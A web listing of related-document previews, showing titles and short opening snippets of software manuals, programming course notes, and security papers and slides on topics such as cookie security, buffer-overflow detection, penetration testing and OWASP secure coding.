More information

CLC Server Command Line Tools USER MANUAL

CLC Server Command Line Tools USER MANUAL CLC Server Command Line Tools USER MANUAL Manual for CLC Server Command Line Tools 2.5 Windows, Mac OS X and Linux September 4, 2015 This software is for research purposes only. QIAGEN Aarhus A/S Silkeborgvej

More information

Firefox, Opera, Safari for Windows BMP file handling information leak. September 2008. Discovered by: Mateusz j00ru Jurczyk, Hispasec Labs

Firefox, Opera, Safari for Windows BMP file handling information leak. September 2008. Discovered by: Mateusz j00ru Jurczyk, Hispasec Labs Firefox, Opera, Safari for Windows BMP file handling information leak September 2008 Discovered by: Mateusz j00ru Jurczyk, Hispasec Labs 1. Introduction The bitmap format implementations in Mozilla Firefox

More information

Packet Capture. Document Scope. SonicOS Enhanced Packet Capture

Packet Capture. Document Scope. SonicOS Enhanced Packet Capture Packet Capture Document Scope This solutions document describes how to configure and use the packet capture feature in SonicOS Enhanced. This document contains the following sections: Feature Overview

More information

Java's garbage-collected heap

Java's garbage-collected heap Sponsored by: This story appeared on JavaWorld at http://www.javaworld.com/javaworld/jw-08-1996/jw-08-gc.html Java's garbage-collected heap An introduction to the garbage-collected heap of the Java

More information

PE_ERR_INVALIDJOBNO (501) You have specified a job number that does not exist.

PE_ERR_INVALIDJOBNO (501) You have specified a job number that does not exist. Overview Error Codes This document lists all the error codes and the descriptions that the Crystal Reports Print Engine generates. PE_ERR_NOTENOUGHMEMORY (500) There is not enough memory available to complete

More information

An Insight into Cookie Security

An Insight into Cookie Security An Insight into Cookie Security Today most websites and web based applications use cookies. Cookies are primarily used by the web server to track an authenticated user or other user specific details. This

More information

Hands-on Hacking Unlimited

Hands-on Hacking Unlimited About Zone-H Attacks techniques (%) File Inclusion Shares misconfiguration SQL Injection DNS attack through social engineering Web Server external module intrusion Attack against the administrator/user

More information

Raima Database Manager Version 14.0 In-memory Database Engine

Raima Database Manager Version 14.0 In-memory Database Engine + Raima Database Manager Version 14.0 In-memory Database Engine By Jeffrey R. Parsons, Senior Engineer January 2016 Abstract Raima Database Manager (RDM) v14.0 contains an all new data storage engine optimized

More information

Introduction to Programming

Introduction to Programming Introduction to Programming If you re new to programming, you might be intimidated by code and flowcharts. You might even wonder how you ll ever understand them. This lesson offers some basic ideas and

More information

Appendix. Web Command Error Codes. Web Command Error Codes

Appendix. Web Command Error Codes. Web Command Error Codes Appendix Web Command s Error codes marked with * are received in responses from the FTP server, and then returned as the result of FTP command execution. -501 Incorrect parameter type -502 Error getting

More information

& Data Processing 2. Exercise 3: Memory Management. Dipl.-Ing. Bogdan Marin. Universität Duisburg-Essen

& Data Processing 2. Exercise 3: Memory Management. Dipl.-Ing. Bogdan Marin. Universität Duisburg-Essen Folie a: Name & Data Processing 2 3: Memory Management Dipl.-Ing. Bogdan Marin Fakultät für Ingenieurwissenschaften Abteilung Elektro-und Informationstechnik -Technische Informatik- Objectives Memory Management

More information

Custom Penetration Testing

Custom Penetration Testing Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1 Objectives Penetration Testing Precompiled Tools

More information

USING LOCAL NETWORK AUDIT SENSORS AS DATA SOURCES FOR INTRUSION DETECTION. Integrated Information Systems Group, Ruhr University Bochum, Germany

USING LOCAL NETWORK AUDIT SENSORS AS DATA SOURCES FOR INTRUSION DETECTION. Integrated Information Systems Group, Ruhr University Bochum, Germany USING LOCAL NETWORK AUDIT SENSORS AS DATA SOURCES FOR INTRUSION DETECTION Daniel Hamburg,1 York Tüchelmann Integrated Information Systems Group, Ruhr University Bochum, Germany Abstract: The increase of

More information

Scalable Network-Based Buffer Overflow Attack Detection

Scalable Network-Based Buffer Overflow Attack Detection Scalable Network-Based Buffer Overflow Attack Detection Paper ID: 327 14 pages Abstract Buffer overflow attack is the main attack method that most if not all existing malicious worms use to propagate themselves

More information

Virtual Memory. How is it possible for each process to have contiguous addresses and so many of them? A System Using Virtual Addressing

Virtual Memory. How is it possible for each process to have contiguous addresses and so many of them? A System Using Virtual Addressing How is it possible for each process to have contiguous addresses and so many of them? Computer Systems Organization (Spring ) CSCI-UA, Section Instructor: Joanna Klukowska Teaching Assistants: Paige Connelly

More information

Differential Slicing: Identifying Causal Execution Differences for Security Applications

Differential Slicing: Identifying Causal Execution Differences for Security Applications Differential Slicing: Identifying Causal Execution Differences for Security Applications Noah M. Johnson, Juan Caballero, Kevin Zhijie Chen, Stephen McCamant, Pongsin Poosankam, Daniel Reynaud, and Dawn

More information

OWASP Secure Coding Practices Quick Reference Guide

OWASP Secure Coding Practices Quick Reference Guide OWASP Secure Coding Practices Quick Reference Guide Copyright and License Copyright 2010 The OWASP Foundation. This document is released under the Creative Commons Attribution ShareAlike 3.0 license. For

More information

/* File: blkcopy.c. size_t n

/* File: blkcopy.c. size_t n 13.1. BLOCK INPUT/OUTPUT 505 /* File: blkcopy.c The program uses block I/O to copy a file. */ #include main() { signed char buf[100] const void *ptr = (void *) buf FILE *input, *output size_t

More information

Introduction to Information Security

Introduction to Information Security Introduction to Information Security 0368-3065, Spring 2015 Lecture 1: Introduction, Control Hijacking (1/2) Eran Tromer Slides credit: Avishai Wool, Tel Aviv University 1 Administration Lecturer: Eran

More information

Working with Buffers

Working with Buffers University Hamburg Department of Informatics Scientific Computing Research Group Working with Buffers Seminar Paper Seminar Efficient Programming in C Christoph Brauer 0brauer@informatik.uni-hamburg.de

More information

FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE

FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security

More information

CS Matters in Maryland CS Principles Course

CS Matters in Maryland CS Principles Course CS Matters in Maryland CS Principles Course Curriculum Overview Project Goals Computer Science (CS) Matters in Maryland is an NSF supported effort to increase the availability and quality of high school

More information

Software Development Tools for Embedded Systems. Hesen Zhang

Software Development Tools for Embedded Systems. Hesen Zhang Software Development Tools for Embedded Systems Hesen Zhang What Are Tools? a handy tool makes a handy man What Are Software Development Tools? Outline Debug tools GDB practice Debug Agent Design Debugging

More information